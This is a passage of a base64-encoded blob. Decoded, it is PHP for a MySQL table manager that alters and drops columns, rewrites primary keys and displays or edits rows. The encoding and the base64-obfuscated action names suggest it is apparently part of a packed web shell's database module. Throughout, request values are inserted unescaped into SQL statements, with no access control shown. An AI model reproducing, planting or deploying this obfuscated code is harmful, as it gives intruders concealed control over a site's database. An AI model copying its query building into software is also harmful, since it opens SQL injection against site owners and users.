kIGFsaWduPWNlbnRlcj48aW5wdXQgdHlwZT10ZXh0IHNpemU9NCBuYW1lPU0gJzsgaWYoICRNICE9ICIiICkgZWNobyAidmFsdWU9JE0iO2VjaG8gJz48L3RkPg0KPHRkIGFsaWduPWNlbnRlcj48aW5wdXQgdHlwZT10ZXh0IHNpemU9NCBuYW1lPUQgJzsgaWYoICREICE9ICIiICkgZWNobyAidmFsdWU9JEQiO2VjaG8gJz48L3RkPg0KPHRkIGFsaWduPWNlbnRlcj48aW5wdXQgdHlwZT1jaGVja2JveCBuYW1lPXVuc2lnbmVkIHZhbHVlPSJVTlNJR05FRCIgJzsgaWYoIHN0cnBvcyggJGZpZWxkdHlwZSwgInVuc2lnbmVkIiApICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPjwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPjxpbnB1dCB0eXBlPWNoZWNrYm94IG5hbWU9emVyb2ZpbGwgdmFsdWU9IlpFUk9GSUxMIiAnOyBpZiggc3RycG9zKCAkZmllbGR0eXBlLCAiemVyb2ZpbGwiICkgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+PC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+PGlucHV0IHR5cGU9Y2hlY2tib3ggbmFtZT1iaW5hcnkgdmFsdWU9IkJJTkFSWSIgJzsgaWYoIHN0cnBvcyggJGZpZWxkdHlwZSwgImJpbmFyeSIgKSAgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+PC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+PGlucHV0IHR5cGU9dGV4dCBzaXplPTYwIG5hbWU9dmFsdWVsaXN0ICc7IGlmKCAkdmFsdWVsaXN0ICE9ICIiICkgZWNobyAidmFsdWU9XCIkdmFsdWVsaXN0XCIiO2VjaG8gJz48L3RkPg0KPC90cj4NCjwvdGFibGU+DQo8aDM+RmxhZ3M8L2gzPg0KPHRhYmxlPg0KPHRyPjx0aD5ub3QgbnVsbDwvdGg+PHRoPmRlZmF1bHQgdmFsdWU8L3RoPjx0aD5hdXRvIGluY3JlbWVudDwvdGg+PHRoPnByaW1hcnkga2V5PC90aD48L3RyPg0KPHRyPg0KPHRkIGFsaWduPWNlbnRlcj48aW5wdXQgdHlwZT1jaGVja2JveCBuYW1lPW5vdF9udWxsIHZhbHVlPSJOT1QgTlVMTCIgJzsgaWYoICRmaWVsZG51bGwgIT0gIllFUyIgKSBlY2hvICJjaGVja2VkIjtlY2hvICc+PC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+PGlucHV0IHR5cGU9dGV4dCBuYW1lPWRlZmF1bHRfdmFsdWUgJzsgaWYoICRmaWVsZGRlZmF1bHQgIT0gIiIgKSBlY2hvICJ2YWx1ZT0kZmllbGRkZWZhdWx0IjtlY2hvICc+PC90ZD4NCjx0ZCBhbGlnbj1jZW50ZXI+PGlucHV0IHR5cGU9Y2hlY2tib3ggbmFtZT1hdXRvX2luY3JlbWVudCB2YWx1ZT0iQVVUT19JTkNSRU1FTlQiICc7IGlmKCAkZmllbGRleHRyYSA9PSAiYXV0b19pbmNyZW1lbnQiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPjwvdGQ+DQo8dGQgYWxpZ249Y2VudGVyPjxpbnB1dCB0eXBlPWNoZWNrYm94IG5hbWU9cHJpbWFyeV9rZXkgdmFsdWU9IlBSSU1BUlkgS0VZIiAnOyBpZiggJGZpZWxka2V5ID09ICJQUkkiICkgZWNobyAiY2hlY2tlZCI7ZWNobyAnPjwvdGQ+DQo8L3RyPg0KPC90YWJsZT4NCjxwPic7DQoJaWYoICRjbWQgPT0gImFkZCIgKQ0KCQllY2hvICI8aW5wdXQgdHlwZT1zdWJtaXQgdmFsdWU9J0FkZCBGaWVsZCc+XG4iOw0KCWVsc2UgaWYoICRjbWQgPT0gImVkaXQiICkNCgkJZWNobyAiPGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPSdFZGl0IEZpZWxkJz5cbiI7DQoJZWNobyAiPGlucHV0IHR5cGU9YnV0dG9uIHZhbHVlPUNhbmNlbCBvbkNsaWNrPSdoaXN0b3J5LmJhY2soKSc+XG4iOw0KCWVjaG8gIjwvZm9ybT5cbiI7DQp9DQoNCmZ1bmN0aW9uIG1hbmFnZUZpZWxkX3N1Ym1pdCggJGNtZCApIHsNCglnbG9iYWwgJG15c3FsSGFuZGxlLCAkZGJuYW1lLCAkdGFibGVuYW1lLCAkb2xkX25hbWUsICRuYW1lLCAkdHlwZSwgJFBIUF9TRUxGLCAkcXVlcnlTdHIsICRlcnJNc2csDQoJCSRNLCAkRCwgJHVuc2lnbmVkLCAkemVyb2ZpbGwsICRiaW5hcnksICRub3RfbnVsbCwgJGRlZmF1bHRfdmFsdWUsICRhdXRvX2luY3JlbWVudCwgJHByaW1hcnlfa2V5LCAkdmFsdWVsaXN0Ow0KCWlmKCAkY21kID09ICJhZGQiICkNCgkJJHF1ZXJ5U3RyID0gIkFMVEVSIFRBQkxFICR0YWJsZW5hbWUgQUREICRuYW1lICI7DQoJZWxzZSBpZiggJGNtZCA9PSAiZWRpdCIgKQ0KCQkkcXVlcnlTdHIgPSAiQUxURVIgVEFCTEUgJHRhYmxlbmFtZSBDSEFOR0UgJG9sZF9uYW1lICRuYW1lICI7DQoJaWYoICRNICE9ICIiICkNCgkJaWYoICREICE9ICIiICkNCgkJCSRxdWVyeVN0ciAuPSAiJHR5cGUoJE0sJEQpICI7DQoJCWVsc2UNCgkJCSRxdWVyeVN0ciAuPSAiJHR5cGUoJE0pICI7DQoJZWxzZSBpZiggJHZhbHVlbGlzdCAhPSAiIiApIHsNCgkJJHZhbHVlbGlzdCA9IHN0cmlwc2xhc2hlcyggJHZhbHVlbGlzdCApOw0KCQkkcXVlcnlTdHIgLj0gIiR0eXBlKCR2YWx1ZWxpc3QpICI7DQoJfSBlbHNlDQoJCSRxdWVyeVN0ciAuPSAiJHR5cGUgIjsNCgkkcXVlcnlTdHIgLj0gIiR1bnNpZ25lZCAkemVyb2ZpbGwgJGJpbmFyeSAiOw0KCWlmKCAkZGVmYXVsdF92YWx1ZSAhPSAiIiApDQoJCSRxdWVyeVN0ciAuPSAiREVGQVVMVCAnJGRlZmF1bHRfdmFsdWUnICI7DQoJJHF1ZXJ5U3RyIC49ICIkbm90X251bGwgJGF1dG9faW5jcmVtZW50IjsNCglteXNxbF9zZWxlY3RfZGIoICRkYm5hbWUsICRteXNxbEhhbmRsZSApOw0KCW15c3FsX3F1ZXJ5KCAkcXVlcnlTdHIsICRteXNxbEhhbmRsZSApOw0KCSRlcnJNc2cgPSBteXNxbF9lcnJvcigpOw0KCS8vIGtleSBjaGFuZ2UNCgkka2V5Q2hhbmdlID0gZmFsc2U7DQoJJHJlc3VsdCA9IG15c3FsX3F1ZXJ5KCAiU0hPVyBLRVlTIEZST00gJHRhYmxlbmFtZSIgKTsNCgkkcHJpbWFyeSA9ICIiOw0KCXdoaWxlKCAkcm93ID0gbXlzcWxfZmV0Y2hfYXJyYXkoJHJlc3VsdCkgKQ0KCQlpZiggJHJvd1siS2V5X25hbWUiXSA9PSAiUFJJTUFSWSIgKSB7DQoJCQlpZiggJHJvd1tDb2x1bW5fbmFtZV0gPT0gJG5hbWUgKQ0KCQkJCSRrZXlDaGFuZ2UgPSB0cnVlOw0KCQkJZWxzZQ0KCQkJCSRwcmltYXJ5IC49ICIsICRyb3dbQ29sdW1uX25hbWVdIjsNCgkJfQ0KCWlmKCAkcHJpbWFyeV9rZXkgPT0gIlBSSU1BUlkgS0VZIiApIHsNCgkJJHByaW1hcnkgLj0gIiwgJG5hbWUiOw0KCQkka2V5Q2hhbmdlID0gISRrZXlDaGFuZ2U7DQoJfQ0KCSRwcmltYXJ5ID0gc3Vic3RyKCAkcHJpbWFyeSwgMiApOw0KCWlmKCAka2V5Q2hhbmdlID09IHRydWUgKSB7DQoJCSRxID0gIkFMVEVSIFRBQkxFICR0YWJsZW5hbWUgRFJPUCBQUklNQVJZIEtFWSI7DQoJCW15c3FsX3F1ZXJ5KCAkcSApOw0KCQkkcXVlcnlTdHIgLj0gIjxicj5cbiIgLiAkcTsNCgkJJGVyck1zZyAuPSAiPGJyPlxuIiAuIG15c3FsX2Vycm9yKCk7DQoJCSRxID0gIkFMVEVSIFRBQkxFICR0YWJsZW5hbWUgQUREIFBSSU1BUlkgS0VZKCAkcHJpbWFyeSApIjsNCgkJbXlzcWxfcXVlcnkoICRxICk7DQoJCSRxdWVyeVN0ciAuPSAiPGJyPlxuIiAuICRxOw0KCQkkZXJyTXNnIC49ICI8YnI+XG4iIC4gbXlzcWxfZXJyb3IoKTsNCgl9DQoJdmlld1NjaGVtYSgpOw0KfQ0KDQpmdW5jdGlvbiBkcm9wRmllbGQoKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJHRhYmxlbmFtZSwgJGZpZWxkbmFtZSwgJFBIUF9TRUxGLCAkcXVlcnlTdHIsICRlcnJNc2c7DQoJJHF1ZXJ5U3RyID0gIkFMVEVSIFRBQkxFICR0YWJsZW5hbWUgRFJPUCBDT0xVTU4gJGZpZWxkbmFtZSI7DQoJbXlzcWxfc2VsZWN0X2RiKCAkZGJuYW1lLCAkbXlzcWxIYW5kbGUgKTsNCglteXNxbF9xdWVyeSggJHF1ZXJ5U3RyICwgJG15c3FsSGFuZGxlICk7DQoJJGVyck1zZyA9IG15c3FsX2Vycm9yKCk7DQoJdmlld1NjaGVtYSgpOw0KfQ0KDQpmdW5jdGlvbiB2aWV3RGF0YSggJHF1ZXJ5U3RyICkgew0KCWdsb2JhbCAkYWN0aW9uLCAkbXlzcWxIYW5kbGUsICRkYm5hbWUsICR0YWJsZW5hbWUsICRQSFBfU0VMRiwgJGVyck1zZywgJHBhZ2UsICRyb3dwZXJwYWdlLCAkb3JkZXJieTsNCgllY2hvICI8aDE+RGF0YSBpbiBUYWJsZTwvaDE+XG4iOw0KCWlmKCAkdGFibGVuYW1lICE9ICIiICkNCgkJZWNobyAiPHAgY2xhc3M9bG9jYXRpb24+JGRibmFtZSAmZ3Q7ICR0YWJsZW5hbWU8L3A+XG4iOw0KCWVsc2UNCgkJZWNobyAiPHAgY2xhc3M9bG9jYXRpb24+JGRibmFtZTwvcD5cbiI7DQoJJHF1ZXJ5U3RyID0gc3RyaXBzbGFzaGVzKCAkcXVlcnlTdHIgKTsNCglpZiggJHF1ZXJ5U3RyID09ICIiICkgew0KCQkkcXVlcnlTdHIgPSAiU0VMRUNUICogRlJPTSAkdGFibGVuYW1lIjsNCgkJaWYoICRvcmRlcmJ5ICE9ICIiICkNCgkJCSRxdWVyeVN0ciAuPSAiIE9SREVSIEJZICRvcmRlcmJ5IjsNCgkJZWNobyAiPGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj1hZGREYXRhJmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJz5BZGQgRGF0YTwvYT4gfCBcbiI7DQoJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249dmlld1NjaGVtYSZkYm5hbWU9JGRibmFtZSZ0YWJsZW5hbWU9JHRhYmxlbmFtZSc+U2NoZW1hPC9hPlxuIjsNCgl9DQoJJHBSZXN1bHQgPSBteXNxbF9kYl9xdWVyeSggJGRibmFtZSwgJHF1ZXJ5U3RyICk7DQoJJGZpZWxkdCA9IG15c3FsX2ZldGNoX2ZpZWxkKCRwUmVzdWx0KTsNCgkkdGFibGVuYW1lID0gJGZpZWxkdC0+dGFibGU7DQoJJGVyck1zZyA9IG15c3FsX2Vycm9yKCk7DQoJJEdMT0JBTFNbcXVlcnlTdHJdID0gJHF1ZXJ5U3RyOw0KCWlmKCAkcFJlc3VsdCA9PSBmYWxzZSApIHsNCgkJZWNob1F1ZXJ5UmVzdWx0KCk7DQoJCXJldHVybjsNCgl9DQoJaWYoICRwUmVzdWx0ID09IDEgKSB7DQoJCSRlcnJNc2cgPSAiU3VjY2VzcyI7DQoJCWVjaG9RdWVyeVJlc3VsdCgpOw0KCQlyZXR1cm47DQoJfQ0KCWVjaG8gIjxocj5cbiI7DQoJJHJvdyA9IG15c3FsX251bV9yb3dzKCAkcFJlc3VsdCApOw0KCSRjb2wgPSBteXNxbF9udW1fZmllbGRzKCAkcFJlc3VsdCApOw0KCWlmKCAkcm93ID09IDAgKSB7DQoJCWVjaG8gIk5vIERhdGEgRXhpc3QhIjsNCgkJcmV0dXJuOw0KCX0NCglpZiggJHJvd3BlcnBhZ2UgPT0gIiIgKSAkcm93cGVycGFnZSA9IDMwOw0KCWlmKCAkcGFnZSA9PSAiIiApICRwYWdlID0gMDsNCgllbHNlICRwYWdlLS07DQoJbXlzcWxfZGF0YV9zZWVrKCAkcFJlc3VsdCwgJHBhZ2UgKiAkcm93cGVycGFnZSApOw0KCWVjaG8gIjx0YWJsZSBjZWxsc3BhY2luZz0xIGNlbGxwYWRkaW5nPTI+XG4iOw0KCWVjaG8gIjx0cj5cbiI7DQoJZm9yKCAkaSA9IDA7ICRpIDwgJGNvbDsgJGkrKyApIHsNCgkJJGZpZWxkID0gbXlzcWxfZmV0Y2hfZmllbGQoICRwUmVzdWx0LCAkaSApOw0KCQllY2hvICI8dGg+IjsNCgkJaWYoJGFjdGlvbiA9PSAiZG1sbGQwUmhkR0U9IikNCgkJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZG1sbGQwUmhkR0U9JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJm9yZGVyYnk9Ii4kZmllbGQtPm5hbWUuIic+Ii4kZmllbGQtPm5hbWUuIjwvYT5cbiI7DQoJCWVsc2UNCgkJCWVjaG8gJGZpZWxkLT5uYW1lLiJcbiI7DQoJCWVjaG8gIjwvdGg+XG4iOw0KCX0NCgllY2hvICI8dGggY29sc3Bhbj0yPkFjdGlvbjwvdGg+XG4iOw0KCWVjaG8gIjwvdHI+XG4iOw0KCWZvciggJGkgPSAwOyAkaSA8ICRyb3dwZXJwYWdlOyAkaSsrICkgew0KCQkkcm93QXJyYXkgPSBteXNxbF9mZXRjaF9yb3coICRwUmVzdWx0ICk7DQoJCWlmKCAkcm93QXJyYXkgPT0gZmFsc2UgKSBicmVhazsNCgkJZWNobyAiPHRyPlxuIjsNCgkJJGtleSA9ICIiOw0KCQlmb3IoICRqID0gMDsgJGogPCAkY29sOyAkaisrICkgew0KCQkJJGRhdGEgPSAkcm93QXJyYXlbJGpdOw0KCQkJJGZpZWxkID0gbXlzcWxfZmV0Y2hfZmllbGQoICRwUmVzdWx0LCAkaiApOw0KCQkJaWYoICRmaWVsZC0+cHJpbWFyeV9rZXkgPT0gMSApDQoJCQkJJGtleSAuPSAiJiIgLiAkZmllbGQtPm5hbWUgLiAiPSIgLiAkZGF0YTsNCgkJCWlmKCBzdHJsZW4oICRkYXRhICkgPiAzMCApDQoJCQkJJGRhdGEgPSBzdWJzdHIoICRkYXRhLCAwLCAzMCApIC4gIi4uLiI7DQoJCQkkZGF0YSA9IGh0bWxzcGVjaWFsY2hhcnMoICRkYXRhICk7DQoJCQllY2hvICI8dGQ+XG4iOw0KCQkJZWNobyAiJGRhdGFcbiI7DQoJCQllY2hvICI8L3RkPlxuIjsNCgkJfQ0KCQlpZiggJGtleSA9PSAiIiApDQoJCQllY2hvICI8dGQgY29sc3Bhbj0yPm5vIEtleTwvdGQ+XG4iOw0KCQllbHNlIHsNCgkJCWVjaG8gIjx0ZD48YSBocmVmPSckUEhQX1NFTEY/YWN0aW9uPWVkaXREYXRhJGtleSZkYm5hbWU9JGRibmFtZSZ0YWJsZW5hbWU9JHRhYmxlbmFtZSc+RWRpdDwvYT48L3RkPlxuIjsNCgkJCWVjaG8gIjx0ZD48YSBocmVmPSckUEhQX1NFTEY/YWN0aW9uPWRlbGV0ZURhdGEka2V5JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJyBvbkNsaWNrPVwicmV0dXJuIGNvbmZpcm0oJ0RlbGV0ZSBSb3c/JylcIj5EZWxldGU8L2E+PC90ZD5cbiI7DQoJCX0NCgkJZWNobyAiPC90cj5cbiI7DQoJfQ0KCWVjaG8gIjwvdGFibGU+XG4iOw0KCWVjaG8gIjxmb250IHNpemU9MiBjbGFzcz1cIm5ld1wiPlxuIjsNCglpZigkYWN0aW9uID09ICJkbWxsZDBSaGRHRT0iKQ0KCQllY2hvICI8Zm9ybSBhY3Rpb249JyRQSFBfU0VMRj9hY3Rpb249ZG1sbGQwUmhkR0U9JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJyBtZXRob2Q9cG9zdD5cbiI7DQoJZWxzZQ0KCQllY2hvICI8Zm9ybSBhY3Rpb249JyRQSFBfU0VMRj9hY3Rpb249cXVlcnkmZGJuYW1lPSRkYm5hbWUmdGFibGVuYW1lPSR0YWJsZW5hbWUmcXVlcnlTdHI9JHF1ZXJ5U3RyJyBtZXRob2Q9cG9zdD5cbiI7DQoJZWNobyAoJHBhZ2UrMSkuIi8iLihpbnQpKCRyb3cvJHJvd3BlcnBhZ2UrMSkuIiBwYWdlIjsNCgllY2hvICI8L2ZvbnQ+XG4iOw0KCWVjaG8gIiB8ICI7DQoJaWYoICRwYWdlID4gMCApIHsNCgkJaWYoJGFjdGlvbiA9PSAiZG1sbGQwUmhkR0U9IikNCgkJCWVjaG8gIjxhIGhyZWY9JyRQSFBfU0VMRj9hY3Rpb249ZG1sbGQwUmhkR0U9JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJnBhZ2U9Ii4oJHBhZ2UpOw0KCQllbHNlDQoJCQllY2hvICI8YSBocmVmPSckUEhQX1NFTEY/YWN0aW9uPXF1ZXJ5JmRibmFtZT0kZGJuYW1lJnRhYmxlbmFtZT0kdGFibGVuYW1lJnF1ZXJ5U3RyPSRxdWVyeVN0ciZwYWdlPSIuKCRwYWdlKTsNCgkJaWYoICRvcmRlcmJ5ICE9ICIiICYmICRhY3Rpb24gPT0gImRtbGxkMFJoZEdFPSIpDQoJCQllY2hvICImb3JkZXJieT0kb3JkZXJieSI7DQoJCWVjaG8gIic+UHJldjwvYT5cbiI7DQoJfSBlbHNlDQoJCWVjaG8gIjxmb250IHNpemU9MiBjbGFzcz1cIm5ld1wiPlByZXY8L2ZvbnQ+IjsNCgllY2hvICIgfCAiOw0KCWlmKCAkcGFnZSA8ICgkcm93LyRyb3dwZXJwYWdlKS0xICkgew0KCQlpZigkYWN0aW9uID09ICJkbWxsZDBSaGRHRT0iKQ0KCQkJZWNobyAiPGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj1kbWxsZDBSaGRHRT0mZGJuYW1lPSRkYm5hbWUmdGFibGVuYW1lPSR0YWJsZW5hbWUmcGFnZT0iLigkcGFnZSsyKTsNCgkJZWxzZQ0KCQkJZWNobyAiPGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj1xdWVyeSZkYm5hbWU9JGRibmFtZSZ0YWJsZW5hbWU9JHRhYmxlbmFtZSZxdWVyeVN0cj0kcXVlcnlTdHImcGFnZT0iLigkcGFnZSsyKTsNCgkJaWYoICRvcmRlcmJ5ICE9ICIiICYmICRhY3Rpb24gPT0gImRtbGxkMFJoZEdFPSIpDQoJCQllY2hvICImb3JkZXJieT0kb3JkZXJieSI7DQoJCWVjaG8gIic+TmV4dDwvYT5cbiI7DQoJfSBlbHNlDQoJCWVjaG8gIk5leHQiOw0KCWVjaG8gIiB8ICI7DQoJaWYoICRyb3cgPiAkcm93cGVycGFnZSApIHsNCgkJZWNobyAiPGlucHV0IHR5cGU9dGV4dCBzaXplPTQgbmFtZT1wYWdlPlxuIjsNCgkJZWNobyAiPGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPSdHbyc+XG4iOw0KCX0NCgllY2hvICI8L2Zvcm0+XG4iOw0KCWVjaG8gIjwvZm9udD5cbiI7DQp9DQoNCmZ1bmN0aW9uIG1hbmFnZURhdGEoICRjbWQgKSB7DQoJZ2xvYmFsICRteXNxbEhhbmRsZSwgJGRibmFtZSwgJHRhYmxlbmFtZSwgJFBIUF9TRUxGOw0KCWlmKCAkY21kID09ICJhZGQiICkNCgkJZWNobyAiPGgxPkFkZCBEYXRhPC9oMT5cbiI7DQoJZWxzZSBpZiggJGNtZCA9PSAiZWRpdCIgKSB7DQoJCWVjaG8gIjxoMT5FZGl0IERhdGE8L2gxPlxuIjsNCgkJJHBSZXN1bHQgPSBteXNxbF9saXN0X2ZpZWxkcyggJGRibmFtZSwgJHRhYmxlbmFtZSApOw0KCQkkbnVtID0gbXlzcWxfbnVtX2ZpZWxkcyggJHBSZXN1bHQgKTsNCgkJJGtleSA9ICIiOw0KCQlmb3IoICRpID0gMDsgJGkgPCAkbnVtOyAkaSsrICkgew0KCQkJJGZpZWxkID0gbXlzcWxfZmV0Y2hfZmllbGQoICRwUmVzdWx0LCAkaSApOw0KCQkJaWYoICRmaWVsZC0+cHJpbWFyeV9rZXkgPT0gMSApDQoJCQkJaWYoICRmaWVsZC0+bnVtZXJpYyA9PSAxICkNCgkJCQkJJGtleSAuPSAkZmllbGQtPm5hbWUgLiAiPSIgLiAkR0xPQkFMU1skZmllbGQtPm5hbWVdIC4gIiBBTkQgIjsNCgkJCQllbHNlDQoJCQkJCSRrZXkgLj0gJGZpZWxkLT5uYW1lIC4gIj0nIiAuICRHTE9CQUxTWyRmaWVsZC0+bmFtZV0gLiAiJyBBTkQgIjsNCgkJfQ0KCQkka2V5ID0gc3Vic3RyKCAka2V5LCAwLCBzdHJsZW4oJGtleSktNCApOw0KCQlteXNxbF9zZWxlY3RfZGIoICRkYm5hbWUsICRteXNxbEhhbmRsZSApOw0KCQkkcFJlc3VsdCA9IG15c3FsX3F1ZXJ5KCAkcXVlcnlTdHIgPSAgIlNFTEVDVCAqIEZST00gJHRhYmxlbmFtZSBXSEVSRSAka2V5IiwgJG15c3FsSGFuZGxlICk7DQoJCSRkYXRhID0gbXlzcWxfZmV0Y2hfYXJyYXkoICRwUmVzdWx0ICk7DQoJfQ0KCWVjaG8gIjxwIGNsYXNzPWxvY2F0aW9uPiRkYm5hbWUgJmd0OyAkdGFibGVuYW1lPC9wPlxuIjsNCgllY2hvICI8Zm9ybSBhY3Rpb249JyRQSFBfU0VMRicgbWV0aG9kPXBvc3Q+XG4iOw0KCWlmKCAkY21kID09ICJhZGQiICkNCgkJZWNobyAiPGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9YWN0aW9uIHZhbHVlPWFkZERhdGFfc3VibWl0PlxuIjsNCgllbHNlIGlmKCAkY21kID09ICJlZGl0IiApDQoJCWVjaG8gIjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWFjdGlvbiB2YWx1ZT1lZGl0RGF0YV9zdWJtaXQ+XG4iOw0KCWVjaG8gIjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWRibmFtZSB2YWx1ZT0kZGJuYW1lPlxuIjsNCgllY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT10YWJsZW5hbWUgdmFsdWU9JHRhYmxlbmFtZT5cbiI7DQoJZWNobyAiPHRhYmxlIGNlbGxzcGFjaW5nPTEgY2VsbHBhZGRpbmc9Mj5cbiI7DQoJZWNobyAiPHRyPlxuIjsNCgllY2hvICI8dGg+TmFtZTwvdGg+XG4iOw0KCWVjaG8gIjx0aD5UeXBlPC90aD5cbiI7DQoJZWNobyAiPHRoPkZ1bmN0aW9uPC90aD5cbiI7DQoJZWNobyAiPHRoPkRhdGE8L3RoPlxuIjsNCgllY2hvICI8L3RyPlxuIjsNCgkkcFJlc3VsdCA9IG15c3FsX2RiX3F1ZXJ5KCAkZGJuYW1lLCAiU0hPVyBmaWVsZHMgRlJPTSAkdGFibGVuYW1lIiApOw0KCSRudW0gPSBteXNxbF9udW1fcm93cyggJHBSZXN1bHQgKTsNCgkkcFJlc3VsdExlbiA9IG15c3FsX2xpc3RfZmllbGRzKCAkZGJuYW1lLCAkdGFibGVuYW1lICk7DQoJZm9yKCAkaSA9IDA7ICRpIDwgJG51bTsgJGkrKyApIHsNCgkJJGZpZWxkID0gbXlzcWxfZmV0Y2hfYXJyYXkoICRwUmVzdWx0ICk7DQoJCSRmaWVsZG5hbWUgPSAkZmllbGRbIkZpZWxkIl07DQoJCSRmaWVsZHR5cGUgPSAkZmllbGRbIlR5cGUiXTsNCgkJJGxlbiA9IG15c3FsX2ZpZWxkX2xlbiggJHBSZXN1bHRMZW4sICRpICk7DQoJCWVjaG8gIjx0cj4iOw0KCQllY2hvICI8dGQ+JGZpZWxkbmFtZTwvdGQ+IjsNCgkJZWNobyAiPHRkPiIuJGZpZWxkWyJUeXBlIl0uIjwvdGQ+IjsNCgkJZWNobyAiPHRkPlxuIjsNCgkJZWNobyAiPHNlbGVjdCBuYW1lPSR7ZmllbGRuYW1lfV9mdW5jdGlvbj5cbiI7DQoJCWVjaG8gIjxvcHRpb24+XG4iOw0KCQllY2hvICI8b3B0aW9uPkFTQ0lJXG4iOw0KCQllY2hvICI8b3B0aW9uPkNIQVJcbiI7DQoJCWVjaG8gIjxvcHRpb24+U09VTkRFWFxuIjsNCgkJZWNobyAiPG9wdGlvbj5DVVJEQVRFXG4iOw0KCQllY2hvICI8b3B0aW9uPkNVUlRJTUVcbiI7DQoJCWVjaG8gIjxvcHRpb24+RlJPTV9EQVlTXG4iOw0KCQllY2hvICI8b3B0aW9uPkZST01fVU5JWFRJTUVcbiI7DQoJCWVjaG8gIjxvcHRpb24+Tk9XXG4iOw0KCQllY2hvICI8b3B0aW9uPlBBU1NXT1JEXG4iOw0KCQllY2hvICI8b3B0aW9uPlBFUklPRF9BRERcbiI7DQoJCWVjaG8gIjxvcHRpb24+UEVSSU9EX0RJRkZcbiI7DQoJCWVjaG8gIjxvcHRpb24+VE9fREFZU1xuIjsNCgkJZWNobyAiPG9wdGlvbj5VU0VSXG4iOw0KCQllY2hvICI8b3B0aW9uPldFRUtEQVlcbiI7DQoJCWVjaG8gIjxvcHRpb24+UkFORFxuIjsNCgkJZWNobyAiPC9zZWxlY3Q+XG4iOw0KCQllY2hvICI8L3RkPlxuIjsNCgkJJHZhbHVlID0gaHRtbHNwZWNpYWxjaGFycygkZGF0YVskaV0pOw0KCQlpZiggJGNtZCA9PSAiYWRkIiApIHsNCgkJCSR0eXBlID0gc3RydG9rKCAkZmllbGR0eXBlLCAiICgsKVxuIiApOw0KCQkJaWYoICR0eXBlID09ICJlbnVtIiB8fCAkdHlwZSA9PSAic2V0IiApIHsNCgkJCQllY2hvICI8dGQ+XG4iOw0KCQkJCWlmKCAkdHlwZSA9PSAiZW51bSIgKQ0KCQkJCQllY2hvICI8c2VsZWN0IG5hbWU9JGZpZWxkbmFtZT5cbiI7DQoJCQkJZWxzZSBpZiggJHR5cGUgPT0gInNldCIgKQ0KCQkJCQllY2hvICI8c2VsZWN0IG5hbWU9JGZpZWxkbmFtZSBzaXplPTQgbXVsdGlwbGU+XG4iOw0KCQkJCXdoaWxlKCAkc3RyID0gc3RydG9rKCAiJyIgKSApIHsNCgkJCQkJZWNobyAiPG9wdGlvbj4kc3RyXG4iOw0KCQkJCQlzdHJ0b2soICInIiApOw0KCQkJCX0NCgkJCQllY2hvICI8L3NlbGVjdD5cbiI7DQoJCQkJZWNobyAiPC90ZD5cbiI7DQoJCQl9IGVsc2Ugew0KCQkJCWlmKCAkbGVuIDwgNDAgKQ0KCQkJCQllY2hvICI8dGQ+PGlucHV0IHR5cGU9dGV4dCBzaXplPTQwIG1heGxlbmd0aD0kbGVuIG5hbWU9JGZpZWxkbmFtZT48L3RkPlxuIjsNCgkJCQllbHNlDQoJCQkJCWVjaG8gIjx0ZD48dGV4dGFyZWEgY29scz00MCByb3dzPTMgbWF4bGVuZ3RoPSRsZW4gbmFtZT0kZmllbGRuYW1lPjwvdGV4dGFyZWE+XG4iOw0KCQkJfQ0KCQl9IGVsc2UgaWYoICRjbWQgPT0gImVkaXQiICkgew0KCQkJJHR5cGUgPSBzdHJ0b2soICRmaWVsZHR5cGUsICIgKCwpXG4iICk7DQoJCQlpZiggJHR5cGUgPT0gImVudW0iIHx8ICR0eXBlID09ICJzZXQiICkgew0KCQkJCWVjaG8gIjx0ZD5cbiI7DQoJCQkJaWYoICR0eXBlID09ICJlbnVtIiApDQoJCQkJCWVjaG8gIjxzZWxlY3QgbmFtZT0kZmllbGRuYW1lPlxuIjsNCgkJCQllbHNlIGlmKCAkdHlwZSA9PSAic2V0IiApDQoJCQkJCWVjaG8gIjxzZWxlY3QgbmFtZT0kZmllbGRuYW1lIHNpemU9NCBtdWx0aXBsZT5cbiI7DQoJCQkJd2hpbGUoICRzdHIgPSBzdHJ0b2soICInIiApICkgew0KCQkJCQlpZiggJHZhbHVlID09ICRzdHIgKQ0KCQkJCQkJZWNobyAiPG9wdGlvbiBzZWxlY3RlZD4kc3RyXG4iOw0KCQkJCQllbHNlDQoJCQkJCQllY2hvICI8b3B0aW9uPiRzdHJcbiI7DQoJCQkJCXN0cnRvayggIiciICk7DQoJCQkJfQ0KCQkJCWVjaG8gIjwvc2VsZWN0PlxuIjsNCgkJCQllY2hvICI8L3RkPlxuIjsNCgkJCX0gZWxzZSB7DQoJCQkJaWYoICRsZW4gPCA0MCApDQoJCQkJCWVjaG8gIjx0ZD48aW5wdXQgdHlwZT10ZXh0IHNpemU9NDAgbWF4bGVuZ3RoPSRsZW4gbmFtZT0kZmllbGRuYW1lIHZhbHVlPVwiJHZhbHVlXCI+PC90ZD5cbiI7DQoJCQkJZWxzZQ0KCQkJCQllY2hvICI8dGQ